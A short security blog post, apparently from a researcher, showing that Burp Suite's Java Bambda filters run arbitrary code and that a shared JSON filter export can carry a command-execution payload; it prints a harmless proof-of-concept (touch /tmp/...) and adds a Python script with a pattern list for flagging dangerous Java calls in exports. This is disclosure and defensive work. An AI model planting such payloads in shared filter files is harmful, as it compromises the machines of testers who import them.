
RCE in Burp's Bambda filters

New Burp feature

On October 20th, 2023 PortSwigger released a neat feature – Java Bambdas. Basically, they are just Java code snippets that Burp Suite compiles on the fly and runs inside its own process.

At the time of writing this post, Bambdas can be used to implement custom filters in Intruder.

How cool is that! We can now execute custom Java code without the need to side load a custom Burp extension.

Naturally, I was very curious to see how hard it would be to achieve RCE via a malicious Burp Bambda. Well, not hard at all! Burp hands the snippet the full Java runtime context, so your typical payload Runtime.getRuntime().exec("...") works just fine.

Exploitation

Things become even more fun if you take into consideration the fact that you can export Bambdas to JSON files and import them again, so they can be shared between devices. The JSON-encoded form of the Bambda from the screenshot above looks like this:

```json
{
    "bambda":{
        "http_history_display_filter":{
            "bambda":"Runtime.getRuntime().exec(\"touch /tmp/hello_from_burp\");\nreturn true;"
        }
    }
}
```

So, watch out for RCEs when downloading “hot” filters from shady guys on Twitter next time!
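A quick triage script for a shared Bambda export, added here as an example and not part of the original post or of Burp itself: it walks the JSON, pulls out every `bambda` source string (the nesting under `bambda` / `http_history_display_filter` is taken from the export above; any other layout is an assumption) and flags Java APIs that a display filter has no reason to call.

```python
import json
import re

# Constructed sample in the export format shown above: a filter that
# spawns a process before returning true for every item.
SAMPLE_EXPORT = r'''{
    "bambda":{
        "http_history_display_filter":{
            "bambda":"Runtime.getRuntime().exec(\"touch /tmp/hello_from_burp\");\nreturn true;"
        }
    }
}'''

# Heuristic list: Bambdas are compiled Java, so reflection or string
# building can hide these calls. A clean result means "nothing obvious".
SUSPICIOUS_APIS = [
    r"Runtime\.getRuntime",
    r"ProcessBuilder",
    r"Class\.forName",
    r"java\.lang\.reflect",
    r"java\.io\.File",
    r"java\.nio\.file",
    r"java\.net\.",
    r"javax\.script",
    r"System\.exit",
]

def iter_bambda_sources(node, path=()):
    """Yield (json_path, source) for every 'bambda' string in the export."""
    if isinstance(node, dict):
        for key, value in node.items():
            if key == "bambda" and isinstance(value, str):
                yield "/".join(path + (key,)), value
            else:
                yield from iter_bambda_sources(value, path + (key,))
    elif isinstance(node, list):
        for i, value in enumerate(node):
            yield from iter_bambda_sources(value, path + (str(i),))

def triage_bambda_export(raw_json):
    """Return [(json_path, line_number, matched_api)] for each suspicious call."""
    findings = []
    for json_path, source in iter_bambda_sources(json.loads(raw_json)):
        for lineno, line in enumerate(source.splitlines(), start=1):
            for pattern in SUSPICIOUS_APIS:
                if re.search(pattern, line):
                    findings.append((json_path, lineno, pattern))
    return findings
```

Run it over a file before hitting "import" in Burp; anything it reports is worth reading line by line, because the snippet runs with the same privileges as Burp itself.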

This post is licensed under CC BY 4.0 by the author.